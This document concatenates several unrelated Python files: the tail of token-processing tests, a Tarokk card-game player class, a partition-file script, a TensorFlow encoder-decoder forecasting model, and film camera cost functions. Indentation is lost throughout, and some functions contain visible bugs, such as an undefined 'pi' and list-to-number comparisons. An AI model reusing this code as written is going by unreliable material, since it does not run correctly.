expected_spaces = [True, False, True, True, True, True, True, True, True, True, True, True, False, False, True, True, True, True, True, False, True, True, True, True, True, False, True, True, True, True, False, False, True, False, True, True, False, False, False, True, True, True, True, True, True, True, True, True, True, True, True, False, False, False, True, True, False, True, True, True, True, False, True, True, True, True, True, True, True, True, True, True, True, True, True, False, False, True, True, False, True, True, True, True, True, True, False, True, True, True, True, False, False]
assert expected_spaces == spaces, spaces
assert expected_words == words, words
def test_surface_string(self):
tokens = [
OrderedDict({'text': 'I', 'misc': {'SpaceAfter': 'No'}}),
OrderedDict({'text': "'m", 'misc': {'SpaceAfter': 'Yes'}}),
OrderedDict({'text': 'sending', 'misc': {'SpaceAfter': 'Yes'}}),
OrderedDict({'text': 'an', 'misc': {'SpaceAfter': 'Yes'}}),
OrderedDict({'text': 'e'}),
OrderedDict({'text': '-', 'misc': {}}),
OrderedDict({'text': 'mail', 'misc': {}}),
OrderedDict({'text': '.'}),
]
actual = surface_string(tokens)
expected = "I'm sending an e-mail."
assert expected == actual, actual
def test_subtract_tokens(self):
a = [
OrderedDict({'id': 1}),
OrderedDict({'id': 2}),
OrderedDict({'id': 3}),
]
b = [
OrderedDict({'id': 2}),
OrderedDict({'id': 3}),
OrderedDict({'id': 4}),
]
aa = list(a)
bb = list(b)
actual = subtract_tokens(a, b)
expected = [OrderedDict([('id', 1)])]
assert expected == actual, actual
assert a == aa
assert b == bb
actual = subtract_tokens(a, a)
assert [] == actual, actual
actual = subtract_tokens([], a)
assert [] == actual, actual
actual = subtract_tokens(a, [])
assert a == actual, actual
|
class Player:
def __init__(self,name, position):
self.name = name
self.hand = []
self.isNextPlayer = False
self.isStarter = False
self.position = position
self.hasPlacedCard = False
self.winBidding = False
self.wantBiddingMore = False
self.gainingCard = 0
self.partnerNumber = 0
def draw(self,deck):
self.hand.append(deck.drawCard())
def showHand(self):
s=self.name
print("## - " +s)
for card in self.hand:
card.show()
def play(self, index):
self.hand.__delitem__(index)
def getFirstTarokk(self,hand):
index = 0
for i in range(len(self.hand)):
if(self.hand[i].suit == 'Tarokk'):
index = i
break
return index
def licit(self,number):
return number
def canLicit(self,hand):
licit = False
for card in hand:
if (card.suit == "Tarokk"):
if(card.value == 1 or card.value == 21 or card.value == 22):
licit = True
break
return licit
def sortingCards(self,hand):
pikkek = []
treffek = []
karok = []
korok = []
tarokkok = []
for card in hand:
if(card.suit == "Pikk"):
pikkek.append(card)
if(card.suit == "Treff"):
treffek.append(card)
if(card.suit == "Karo"):
karok.append(card)
if(card.suit == "Kor"):
korok.append(card)
if(card.suit == "Tarokk"):
tarokkok.append(card)
pikkek = sorted(pikkek,key=lambda card: card.value)
treffek = sorted(treffek,key=lambda card: card.value)
karok = sorted(karok,key=lambda card: card.value)
korok = sorted(korok,key=lambda card: card.value)
tarokkok = sorted(tarokkok,key=lambda card: card.value)
self.hand = pikkek+treffek+karok+korok+tarokkok
|
import sys
import os
"""
Open a partition file, and add an A after each G[...]
to select median gamma rates instead of mean.
Then output the new partitions into another file
"""
if (len(sys.argv) != 3):
print("usage: python add_median.py input_part output_part")
sys.exit(1)
input_part = sys.argv[1]
output_part = sys.argv[2]
if (input_part == output_part):
print("Error: both files are the same. Exiting")
sys.exit(2)
lines = open(input_part).readlines()
with open(output_part, "w") as writer:
for line in lines:
split_line = line.split(",")
model = split_line[0]
if (model == "LG4M"):
model = "LG4M+G4"
elif (model == "LG4M+I"):
model = "LG4M+I+G4"
split = model.split("+")
for idx, elem in enumerate(split):
if (elem.startswith("G")):
split[idx] = elem + "A"
split_line[0] = "+".join(split)
writer.write(",".join(split_line))
|
import tensorflow as tf
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
from pandas import read_csv
from sklearn.preprocessing import MinMaxScaler
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
from tensorflow.contrib import rnn
# from utils.preprocessing_data import Timeseries
from model.utils.preprocessing_data_forBNN import MultivariateTimeseriesBNNUber
import time
"""This class build the model BNN with initial function and train function"""
class Model:
def __init__(self, original_data = None, external_feature = None, train_size = None, valid_size = None,
sliding_encoder = None, sliding_decoder = None, sliding_inference = None,
batch_size = None, num_units_LSTM = None, num_layers = None,
activation = None, optimizer = None,
# n_input = None, n_output = None,
learning_rate = None, epochs_encoder_decoder = None, epochs_inference = None,
input_dim = None, num_units_inference = None, patience = None, number_out_decoder = 1, dropout_rate = 0.8):
self.original_data = original_data
self.external_feature = external_feature
self.train_size = train_size
self.valid_size = valid_size
self.sliding_encoder = sliding_encoder
self.sliding_decoder = sliding_decoder
self.sliding_inference = sliding_inference
self.batch_size = batch_size
self.num_units_LSTM = num_units_LSTM
self.activation = activation
self.optimizer = optimizer
# self.n_input = n_input
# self.n_output = n_output
self.learning_rate = learning_rate
self.epochs_encoder_decoder = epochs_encoder_decoder
self.epochs_inference = epochs_inference
self.input_dim = input_dim
self.num_units_inference = num_units_inference
self.patience = patience
self.number_out_decoder = number_out_decoder
self.dropout_rate = dropout_rate
def preprocessing_data(self):
timeseries = MultivariateTimeseriesBNNUber(self.original_data, self.external_feature, self.train_size, self.valid_size, self.sliding_encoder, self.sliding_decoder, self.sliding_inference, self.input_dim,self.number_out_decoder)
self.train_x_encoder, self.valid_x_encoder, self.test_x_encoder, self.train_x_decoder, self.valid_x_decoder, self.test_x_decoder, self.train_y_decoder, self.valid_y_decoder, self.test_y_decoder, self.min_y, self.max_y, self.train_x_inference, self.valid_x_inference, self.test_x_inference, self.train_y_inference, self.valid_y_inference, self.test_y_inference = timeseries.prepare_data()
def init_RNN(self, num_units, activation):
print (len(self.test_y_inference))
print (self.test_x_encoder[-1])
print (self.test_x_inference[-1])
print (self.test_y_inference[-1])
print(num_units)
num_layers = len(num_units)
print (num_layers)
hidden_layers = []
for i in range(num_layers):
if(i==0):
cell = tf.contrib.rnn.LSTMCell(num_units[i],activation = activation)
cell = tf.nn.rnn_cell.DropoutWrapper(cell,
input_keep_prob = 1.0,
output_keep_prob = self.dropout_rate,
state_keep_prob = self.dropout_rate,
variational_recurrent = True,
input_size = self.input_dim,
dtype=tf.float32)
hidden_layers.append(cell)
else:
cell = tf.contrib.rnn.LSTMCell(num_units[i],activation = activation)
cell = tf.nn.rnn_cell.DropoutWrapper(cell,
input_keep_prob = self.dropout_rate,
output_keep_prob = self.dropout_rate,
state_keep_prob = self.dropout_rate,
variational_recurrent = True,
input_size = self.num_units_LSTM[i-1],
dtype=tf.float32)
hidden_layers.append(cell)
rnn_cells = tf.contrib.rnn.MultiRNNCell(hidden_layers, state_is_tuple = True)
return rnn_cells
def mlp(self, input, num_units, activation):
num_layers = len(num_units)
prev_layer = input
for i in range(num_layers):
prev_layer = tf.layers.dense(prev_layer,
num_units[i],
activation = activation,
name = 'layer'+str(i))
drop_rate = 1 - self.dropout_rate
prev_layer = tf.layers.dropout(prev_layer , rate = drop_rate)
prediction = tf.layers.dense(inputs=prev_layer,
units=1,
activation = activation,
name = 'output_layer')
return prediction
def early_stopping(self, array, patience):
value = array[len(array) - patience - 1]
arr = array[len(array)-patience:]
check = 0
for val in arr:
if(val > value):
check += 1
if(check == patience):
return False
else:
return True
def fit(self):
self.preprocessing_data()
print ("================check preprocessing data ok==================")
print ('self.train_x_encoder')
print (self.train_x_encoder[0])
print ('self.train_x_decoder')
print (self.train_x_decoder[0])
print ('self.train_y_decoder')
print (self.train_y_decoder[0])
print (self.train_y_decoder.shape)
print ('self.train_x_inference')
print (self.train_x_inference[0])
print ('self.train_y_inference')
print (self.train_y_inference[0])
print ('test y')
print (self.test_y_inference)
print (self.min_y)
print (self.max_y)
print (len(self.train_x_encoder))
# lol111
self.train_x_encoder = np.array(self.train_x_encoder)
self.train_x_decoder = np.array(self.train_x_decoder)
self.test_x_encoder = np.array(self.test_x_encoder)
self.test_x_decoder = np.array(self.test_x_decoder)
self.test_y_decoder = np.array(self.test_y_decoder)
self.train_x_inference = np.array(self.train_x_inference)
# print ('self.train_x_inference')
# print (self.train_x_inference)
self.test_x_inference = np.array(self.test_x_inference)
self.n_input_encoder = self.train_x_encoder.shape[1]
self.n_input_decoder = self.train_x_decoder.shape[1]
self.n_output_inference = self.train_y_inference.shape[1]
self.n_output_encoder_decoder = self.train_y_decoder.shape[1]
if(self.activation == 1):
activation = tf.nn.sigmoid
elif(self.activation == 2):
activation= tf.nn.relu
elif(self.activation== 3):
activation = tf.nn.tanh
elif(self.activation == 4):
activation = tf.nn.elu
if(self.optimizer == 1):
optimizer = tf.train.MomentumOptimizer(learning_rate = self.learning_rate, momentum = 0.9)
elif(self.optimizer == 2):
optimizer = tf.train.AdamOptimizer(learning_rate = self.learning_rate)
else:
optimizer = tf.train.RMSPropOptimizer(learning_rate = self.learning_rate)
print (self.sliding_encoder)
print (len(self.original_data))
tf.reset_default_graph()
x1 = tf.placeholder("float",[None, self.sliding_encoder*len(self.original_data)/self.input_dim, self.input_dim])
x2 = tf.placeholder("float",shape = (None, self.sliding_decoder*len(self.original_data)/self.input_dim, self.input_dim))
if(self.number_out_decoder == 1):
y1 = tf.placeholder("float", [None, self.sliding_decoder])
with tf.variable_scope('encoder'):
encoder = self.init_RNN(self.num_units_LSTM,activation)
# input_encoder=tf.unstack(x1 ,[None,self.sliding_encoder/self.time_step,self.time_step])
outputs_encoder, new_state_encoder=tf.nn.dynamic_rnn(encoder, x1, dtype="float32")
outputs_encoder = tf.identity(outputs_encoder, name='outputs_encoder')
with tf.variable_scope('decoder'):
decoder = self.init_RNN(self.num_units_LSTM,activation)
outputs_decoder, new_state_decoder=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state=new_state_encoder)
prediction = outputs_decoder[:,:,-1]
loss_encoder_decoder = tf.reduce_mean(tf.square(y1-prediction))
optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
else:
y11 = tf.placeholder("float", [None, self.sliding_decoder])
y12 = tf.placeholder("float", [None, self.sliding_decoder])
with tf.variable_scope('encoder'):
encoder = self.init_RNN(self.num_units_LSTM,activation)
# input_encoder=tf.unstack(x1 ,[None,self.sliding_encoder/self.time_step,self.time_step])
outputs_encoder,new_state_encoder=tf.nn.dynamic_rnn(encoder, x1, dtype="float32")
# with tf.control_dependencies([state.assign(state_encoder)]):
# outputs_encoder = tf.identity(outputs_encoder, name='outputs_encoder')
with tf.variable_scope('decoder1'):
decoder = self.init_RNN(self.num_units_LSTM,activation)
outputs_decoder1,new_state_decoder1=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state = new_state_encoder)
with tf.variable_scope('decoder2'):
decoder = self.init_RNN(self.num_units_LSTM,activation)
outputs_decoder2,new_state_decoder2=tf.nn.dynamic_rnn(decoder, x2,dtype="float32", initial_state = new_state_encoder)
prediction1 = outputs_decoder1[:,:,-1]
prediction2 = outputs_decoder2[:,:,-1]
loss_encoder_decoder = tf.reduce_mean(tf.square(y11-prediction1) + tf.square(y12-prediction2))
optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
# out_weights=tf.Variable(tf.random_normal([int(self.sliding_decoder*len(self.original_data)/self.input_dim), self.n_output_encoder_decoder]))
# out_bias=tf.Variable(tf.random_normal([self.n_output_encoder_decoder]))
# else:
#
x3 = tf.placeholder("float",[None, 1, int(self.sliding_inference*len(self.external_feature))])
y2 = tf.placeholder("float", [None, self.n_output_inference])
# input_decoder=tf.unstack(x2 ,self.sliding_decoder/self.time_step,self.time_step)
# prediction = outputs_decoder[:,:,-1]
# prediction=activation(tf.matmul(outputs_decoder[:,:,-1],out_weights)+out_bias)
# prediction_inverse = prediction * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
# y1_inverse = y1 * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
# loss_function
# loss_encoder_decoder = tf.reduce_mean(tf.square(y1-prediction))
#optimization
# optimizer_encoder_decoder = optimizer.minimize(loss_encoder_decoder)
# state = tf.tile(state_encoder[-1].h)
# state = tf.shape(x3)[0]
state = tf.reshape(new_state_encoder[-1].h, [tf.shape(x3)[0], 1, self.num_units_LSTM[-1]])
input_inference = tf.concat([x3,state],2)
input_inference = tf.reshape(input_inference,[tf.shape(x3)[0], self.sliding_inference*len(self.external_feature) + self.num_units_LSTM[-1]])
# state_encoder = np.reshape(state_encoder[-1].h, [4])
# state_encoder = tf.reshape(state_encoder[-1].h, [None, 1, self.num_units])
# input_inference = tf.concat([x3, state_encoder[-1].h],0)
output_inference = self.mlp(input_inference, self.num_units_inference, activation)
# hidden_value1 = tf.layers.dense(input_inference, self.num_units_inference, activation=activation)
# hidden1 = tf.layers.dropout(hidden_value1 , rate = 0.9)
# hidden_value2 = tf.layers.dense(hidden_value1, 4, activation=activation)
# output_inference = tf.layers.dense(hidden1,self.n_output_inference, activation=activation)
# # loss
loss_inference = tf.reduce_mean(tf.square(y2-output_inference))
#optimization
optimizer_inference = optimizer.minimize(loss_inference)
output_inference_inverse = output_inference * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
y2_inverse = y2
MAE = tf.reduce_mean(tf.abs(tf.subtract(output_inference_inverse,y2_inverse)) )
RMSE = tf.sqrt(tf.reduce_mean(tf.square(tf.subtract(output_inference_inverse,y2_inverse))))
cost_train_encoder_decoder_set = []
cost_valid_encoder_decoder_set = []
cost_train_inference_set = []
cost_valid_inference_set = []
epoch_set=[]
init=tf.global_variables_initializer()
with tf.Session() as sess:
saver = tf.train.Saver()
sess.run(init)
# training encoder_decoder
print ("start training encoder_decoder")
if (self.number_out_decoder == 1):
for epoch in range(self.epochs_encoder_decoder):
start_time = time.time()
# Train with each example
print ('epoch encoder_decoder: ', epoch+1)
total_batch = int(len(self.train_x_encoder)/self.batch_size)
# print (total_batch)
# sess.run(updates)
avg_cost = 0
for i in range(total_batch):
batch_xs_encoder,batch_xs_decoder = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_decoder[i*self.batch_size:(i+1)*self.batch_size]
batch_ys = self.train_y_decoder[i*self.batch_size:(i+1)*self.batch_size]
# print (sess.run(outputs_encoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys}))
# print (sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys}))
sess.run(optimizer_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys})
avg_cost += sess.run(loss_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y1:batch_ys})/total_batch
if(i == total_batch -1):
a = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
# Display logs per epoch step
print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
cost_train_encoder_decoder_set.append(avg_cost)
val_cost = sess.run(loss_encoder_decoder, feed_dict={x1:self.valid_x_encoder,x2:self.valid_x_decoder, y1: self.valid_y_decoder})
cost_valid_encoder_decoder_set.append(val_cost)
if (epoch > self.patience):
if (self.early_stopping(cost_train_encoder_decoder_set, self.patience) == False):
print ("early stopping encoder-decoder training")
break
print ("Epoch encoder-decoder finished")
print ('time for epoch encoder-decoder: ', epoch + 1 , time.time()-start_time)
print ('training encoder-decoder ok!!!')
else:
for epoch in range(self.epochs_encoder_decoder):
start_time = time.time()
# Train with each example
print ('epoch encoder_decoder: ', epoch+1)
total_batch = int(len(self.train_x_encoder)/self.batch_size)
# print (total_batch)
# sess.run(updates)
avg_cost = 0
for i in range(total_batch):
batch_xs_encoder,batch_xs_decoder = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_decoder[i*self.batch_size:(i+1)*self.batch_size]
batch_ys1, batch_ys2 = self.train_y_decoder[0][i*self.batch_size:(i+1)*self.batch_size], self.train_y_decoder[1][i*self.batch_size:(i+1)*self.batch_size]
sess.run(optimizer_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder, y11:batch_ys1, y12:batch_ys2})
avg_cost += sess.run(loss_encoder_decoder,feed_dict={x1: batch_xs_encoder,x2: batch_xs_decoder,y11:batch_ys1, y12:batch_ys2})/total_batch
if(i == total_batch -1):
a = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
# Display logs per epoch step
print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
cost_train_encoder_decoder_set.append(avg_cost)
val_cost = sess.run(loss_encoder_decoder, feed_dict={x1:self.valid_x_encoder,x2:self.valid_x_decoder, y11: self.valid_y_decoder[0],y12: self.valid_y_decoder[1]})
cost_valid_encoder_decoder_set.append(val_cost)
if (epoch > self.patience):
if (self.early_stopping(cost_train_encoder_decoder_set, self.patience) == False):
print ("early stopping encoder-decoder training")
break
print ("Epoch encoder-decoder finished")
print ('time for epoch encoder-decoder: ', epoch + 1 , time.time()-start_time)
print ('training encoder-decoder ok!!!')
# training inferences
print ('start training inference')
for epoch in range(self.epochs_inference):
start_time = time.time()
print ("epoch inference: ", epoch+1)
total_batch = int(len(self.train_x_inference)/self.batch_size)
# print (total_batch)
# sess.run(updates)
avg_cost = 0
for i in range(total_batch):
batch_xs_encoder,batch_xs_inference ,batch_ys = self.train_x_encoder[i*self.batch_size:(i+1)*self.batch_size], self.train_x_inference[i*self.batch_size:(i+1)*self.batch_size],self.train_y_inference[i*self.batch_size:(i+1)*self.batch_size]
# print ('input_inference')
s_e = sess.run(new_state_encoder,feed_dict={x1: batch_xs_encoder})
sess.run(optimizer_inference,feed_dict={x1: batch_xs_encoder,x3: batch_xs_inference, y2:batch_ys})
avg_cost += sess.run(loss_inference,feed_dict={x1: batch_xs_encoder,x3: batch_xs_inference,y2: batch_ys})/total_batch
# if(i == total_batch -1):
# print (sess.run(state_encoder,feed_dict={x1: batch_xs_encoder}))
print ("Epoch:", '%04d' % (epoch+1),"cost=", "{:.9f}".format(avg_cost))
cost_train_inference_set.append(avg_cost)
# epoch_set.append(epoch+1)
val_cost = sess.run(loss_inference, feed_dict={x1:self.valid_x_encoder,x3:self.valid_x_inference, y2: self.valid_y_inference})
cost_valid_inference_set.append(val_cost)
if (epoch > self.patience):
if (self.early_stopping(cost_train_inference_set , self.patience) == False):
print ("early stopping inference training")
break
print ('time for epoch inference: ', epoch + 1 , time.time()-start_time)
# output_inference_inverse = sess.run(output_inference_inverse, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
# output_inference = sess.run(output_inference, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
# print (output_inference)
vector_state = sess.run(new_state_encoder[-1].h,feed_dict={x1:self.test_x_encoder})
outputs = []
MSE = []
error_model = []
B = 50
for i in range(B):
print (i)
MAEi = sess.run(MAE, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
RMSEi = sess.run(RMSE, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
output_inference_inversei = sess.run(output_inference_inverse, feed_dict={x1:self.test_x_encoder,x3:self.test_x_inference, y2: self.test_y_inference})
# print ('MAE: ', MAEi)
# print ('RMSE: ', RMSEi)
errori = [MAEi, RMSEi]
error_model.append(errori)
outputs.append(output_inference_inversei)
output_inference_inverse_valid = sess.run(output_inference_inverse, feed_dict={x1:self.valid_x_encoder,x3:self.valid_x_inference, y2: self.valid_y_inference})
err_valid = 0
error_model = np.average(error_model,axis = 0)
for i in range(len(output_inference_inverse_valid)):
test_valid = self.valid_y_inference * (self.max_y[0] - self.min_y[0]) + self.min_y[0]
err_valid += np.square(output_inference_inverse_valid[i][0]-test_valid[i])/len(output_inference_inverse_valid)
y_pre = []
error = []
for k in range(len(self.test_y_inference)):
errork = 0
outk = 0
y_prei = []
errori = []
for t in range(B):
outk += outputs[t][k][0]/B
errork += np.square(self.test_y_inference[k] - outputs[t][k][0])
errori.append(errork)
y_prei.append(outk)
y_pre.append(y_prei)
error.append(errori)
# print ("====================")
# print (outputs[0])
# print (outputs[1])
# print(y_pre)
# # lol
# print (error)
# print(err_valid)
uncertainty = []
for i in range(len(error)):
uncertainty_i = np.sqrt(error[i][0] + err_valid[0])
uncertainty.append(uncertainty_i)
name_LSTM = ""
for i in range(len(self.num_units_LSTM)):
if (i == len(self.num_units_LSTM) - 1):
name_LSTM += str(self.num_units_LSTM[i])
else:
name_LSTM += str(self.num_units_LSTM[i]) +'_'
name_inference = ""
for i in range(len(self.num_units_inference)):
if (i == len(self.num_units_inference) - 1):
name_inference += str(self.num_units_inference[i])
else:
name_inference += str(self.num_units_inference[i]) +'_'
folder_to_save_result = 'results/multivariate/cpu/5minutes/bnn_multivariate_uber_ver2/'
file_name = str(self.sliding_encoder) + '-' + str(self.sliding_decoder) + '-' + str(self.sliding_inference) + '-' + str(self.batch_size) + '-' + name_LSTM + '-' + str(self.activation)+ '-' + str(self.optimizer) + '-' + str(self.input_dim) + '-' + name_inference +'-'+str(self.number_out_decoder) +'-'+str(self.dropout_rate)
history_file = folder_to_save_result + 'history/' + file_name + '.png'
prediction_file = folder_to_save_result + 'prediction/' + file_name + '.csv'
vector_state_file = folder_to_save_result + 'vector_representation/' + file_name + '.csv'
uncertainty_file = folder_to_save_result + 'uncertainty/' + file_name + '.csv'
save_path = saver.save(sess, 'results/multivariate/cpu/5minutes/bnn_multivariate_uber_ver2/model_saved/' + file_name+'/model')
plt.plot(cost_train_inference_set)
plt.plot(cost_valid_inference_set)
plt.plot(cost_train_encoder_decoder_set)
plt.plot(cost_valid_encoder_decoder_set)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train_inference', 'validation_inference','train_encoder_decoder', 'validation_encoder_decoder'], loc='upper left')
# plt.show()
# plt.savefig('/home/thangnguyen/hust/lab/machine_learning_handling/history/history_mem.png')
plt.savefig(history_file)
plt.close()
predictionDf = pd.DataFrame(np.array(y_pre))
# predictionDf.to_csv('/home/thangnguyen/hust/lab/machine_learning_handling/results/result_mem.csv', index=False, header=None)
predictionDf.to_csv(prediction_file, index=False, header=None)
uncertaintyDf = pd.DataFrame(np.array(uncertainty))
uncertaintyDf.to_csv(uncertainty_file, index=False, header=None)
# errorDf.to_csv(prediction_file, index=False, header=None)
vector_stateDf = pd.DataFrame(np.array(vector_state))
vector_stateDf.to_csv(vector_state_file, index=False, header=None)
sess.close()
return error_model
|
"""cost functions for camera optimization
Lin Sun
May 16 2019
"""
import math
from utils import utils
from cost_functions import cost_curve
"""
cost functions can be divided into:
current quality functions (node cost)
transfer functions (edge cost)
duration function (hops cost)
"""
FRAMEX = 1024
FRAMEY = 768
FRAMESIZE = FRAMEX*FRAMEY
FRAME_DIAGONAL = math.sqrt(FRAMEX ** 2 + FRAMEY ** 2)
QUALITY_WEIGHTS = [0.4, 0.5, 0.2, 0.1, 2, 0.2]
TRANSFER_WEIGHTS = [0.2, 0.2, 0.3, 0.3]
def getVisibilityCost(subVis, objVis):
"""
:param subVis: subject visibilities
:param objVis: object visibilities
:return: visibility proximity cost
description:
visibility cost is one of the node cost
subject: action subject, object: action object
subVis: onscreen visibility of all subjects for this node
objVis: onscreen visibility of all objects for this node
FRAMESIZE: actual frame size after rendering
1 - (subject visibility + object visibility)/FRAMESIZE is the normalized cost for how much of the current action
can be seen after rendering for this node
"""
# TODO: Should it consider object or character actual size?
cost = 1 - (sum(map(sum, subVis)) + sum(map(sum, objVis))) / FRAMESIZE
return cost
def getHitchCockCost(actions_list, subVis_list, objVis_list):
"""
:param actions_list: action list
:param subVis_list: subject visibility list
:param objVis_list: object visibility list
:return: hitchcock cost
description:
Hitchcock mentioned "the size of an object in the frame should be equal to its importance in the story at that momentum"
hitchcock cost is measuring whether the character/item onscreen visibility is proportional to its importance in the action
For visibility of characters, it is divided into 6 parts: [front head, back head, front upper body, back upper body, front lower body, back lower body]
For visibility of items, it is divided into 2 parts: [front, back]
for a single action, the importance between subject and object are different
for a single action, the importance of body parts are different
In order to calculate hitchcock cost, first find the action, then get the action SO (subject object importance distribution), then get the body (different body part importance distribution)
The main purpose is to see whether different part of different characters/items visibility is proportional to its importance
"""
hcCosts = []
for i in range(len(actions_list)):
objVis = objVis_list[i]
subVis = subVis_list[i]
action = actions_list[i]
if not objVis:
cost = 0
# subVis can include character vis and object vis
totalVis = sum(map(sum, subVis))
if totalVis == 0:
hcCosts.append(1)
else:
# subjects can be characters or items
for i in range(len(subVis)):
if len(subVis[i]) == 6:
for j in range(6):
cost += abs(
(utils.getSOImportance(action)[0] / len(subVis)) * utils.getBodyImportance(action)[j] - subVis[i][j] / totalVis)
if len(subVis[i]) == 2:
for j in range(2):
cost += abs(
(utils.getSOImportance(action)[0] / len(subVis)) * utils.getObjectImportance()[j] - subVis[i][j] / totalVis)
hcCosts.append(cost / len(subVis))
# if this action has objects
else:
cost = 0
totalVis = sum(map(sum, subVis)) + sum(map(sum, objVis))
if totalVis == 0:
hcCosts.append(1)
else:
subjectImportance = utils.getSOImportance(action)[0] / len(subVis)
objectImportance = utils.getSOImportance(action)[1] / len(objVis)
bodyImportance = utils.getBodyImportance(action)
itemImportance = utils.getObjectImportance()
for i in range(len(subVis)):
if len(subVis[i]) == 6:
# this subject is a character subject
for j in range(6):
cost += abs(subjectImportance * bodyImportance[j] - subVis[i][j] / totalVis)
if len(subVis[i]) == 2:
# this subject is a item subject
for j in range(2):
cost += abs(subjectImportance * bodyImportance[j] - subVis[i][j] / totalVis)
for i in range(len(objVis)):
if len(objVis[i]) == 6:
for j in range(6):
cost += abs(objectImportance * bodyImportance[j] - objVis[i][j] / totalVis)
if len(objVis[i]) == 2:
for j in range(2):
cost += abs(objectImportance * bodyImportance[j] - objVis[i][j] / totalVis)
hcCosts.append(cost / (len(subVis) + len(objVis)))
return sum(hcCosts) / len(hcCosts)
def getLookRoomCost(eyepos, eyeThetas):
"""
:param eyepos: human on screen eye position
:param eyeThetas: human on screen eye direction
:return: lookroom cost
description:
look room is the distance from left boundary to character eye's onscreen position and the eye's onscreen position's distance to right boundary
if the character is looking to right, then the lookroom to right boundary should be larger
if the character is looking to left, then the lookroom to left boundary should be larger
curve is the weight function curve, a combination of two sigmoid function.
But here because the character's eye orientation is not concerned in animation, we assume all eyes are looking perpendicular to viewers
"""
cost = 0
# print(eyepos)
for i, pos in enumerate(eyepos):
if pos != ["NA", "NA"]:
# not using eye direction now, character models are not considering eye orientations
theta = eyeThetas[i]
[x, y] = eyepos[i]
leftRoom = x
rightRoom = FRAMESIZE - x
cost += cost_curve.lookRoomCostCurve(leftRoom / FRAMEX, 0)
# TODO: lookroom cost should consider eye thetas, but our model has limited gaze orientation, ignore for now
# use right-hand coordinate system
# if theta <= 0:
# # face facing left in 2D
# cost += lookRoomCostCurve(leftRoom / FRAMEX, theta)
# else:
# # face facing right in 2D
# cost += lookRoomCostCurve(rightRoom / FRAMEX, theta)
else:
cost += 1
return cost / len(eyepos)
def getHeadRoomCost(headTop):
"""
:param headTop: character on screen headroom
:return: headroom cost
description:
characters' heads should not be too close or too far from the top boundary of frame
"""
cost = 0
for top in headTop:
if top != "NA":
cost += cost_curve.headRoomCostCurve(top)
# normalize
return cost / len(headTop)
def getGazeContinuityCost(faceThetas1, faceThetas2, charImportance):
"""
:param faceThetas1: character on screen face orientation in first node
:param faceThetas2: character on screen face orientation in second node
:param charImportance: character importance
:return: gaze continuity cost
description:
NOT USED IN CURRENT VERSION
character's gaze direction should be consistent between shots
"""
cost = 0
for i in range(len(faceThetas1)):
if faceThetas1[i] and faceThetas2[i]:
if (faceThetas1 > math.pi / 2 and faceThetas2 > pi / 2) or (faceThetas1 < pi / 2 and faceThetas2 < pi / 2):
cost += charImportance[i] * 1
return cost
def getPosContinuityCost(eyepos1, eyepos2):
"""
:param eyepos1: character eye position in first node
:param eyepos2: character eye position in second node
:return: character eye position continuity cost
description:
character's eye position should be consistent between shots
"""
cost = cost_curve.positionChangeCurve(eyepos1, eyepos2)
return cost
def getMotionContinuityCost(motion1, motion2):
"""
:param motion1: character on screen moving direction in first node
:param motion2: character on screen moving direction in second node
:return: motion continuity cost
description:
character's on screen moving direction should be consistent between shots
"""
if motion1 != motion2:
return 1
return 0
def getLeftRightContinuityCost(order1, order2):
"""
:param order1: characters on screen order in first node
:param order2: characters on screen order in second node
:return: characters on screen order continuity
description:
character's on screen position should be consistent between shots
180 theory
"""
if len(order1) == len(order2) and len(order1) != 0:
cost = 0
for i in range(len(order1)):
cost += (order1[i] != order2[i])
return cost / len(order1)
else:
return 0
def getShotOrderCost(dist):
"""
:param dist:
:return: shot order cost
description:
expose background information at the beginning of a scene
cameras with higher shot size should have higher probability to show at the beginning
"""
return cost_curve.shotOrderCurve(dist)
def getDurationCost(node1, node2, d):
"""
:param node1: first node
:param node2: second node
:param d: duration
:return: duration cost
description:
in patent I mentioned shot intensity should be proportional to user sepecified story intensity. Because the director's hint idea is not
considered in project for now, we use average duration = 3 seconds
"""
if node1[1] == node2[1]:
return cost_curve.durationCurve(0)
return cost_curve.durationCurve(d)
def getCharacterConflictsCost(node, conflict_int):
"""
:param node: graph node
:param conflict_int: user defined character conflict intensity
:return: conflict cost
"""
pass
def getCharacterEmotionCost(node, emotion_int):
"""
:param node: graph mode
:param emotion_int: user defined emotion intensity
:return: emotion cost
"""
pass
def getCameraMovementCost(node, handheld_int):
"""
:param node: graph node
:param handheld_int: user defined handheld intensity
:return: handheld cost
"""
pass
def getPOVCost(t, cam, protagonist, cameraIndex, characterIndex):
"""
:param t: node time
:param cam: node camera
:param protagonist: story protagonist
:param cameraIndex: camera description list
:param characterIndex: character description list
:return: POV cost
description:
In patent POV is one the user input for fixing default cameras. Here due to the imcomplete of user input, of the character is mentioned
to "look" something, and this character has high importance (calculated protagonist), try to trigger this character's POV camera
"""
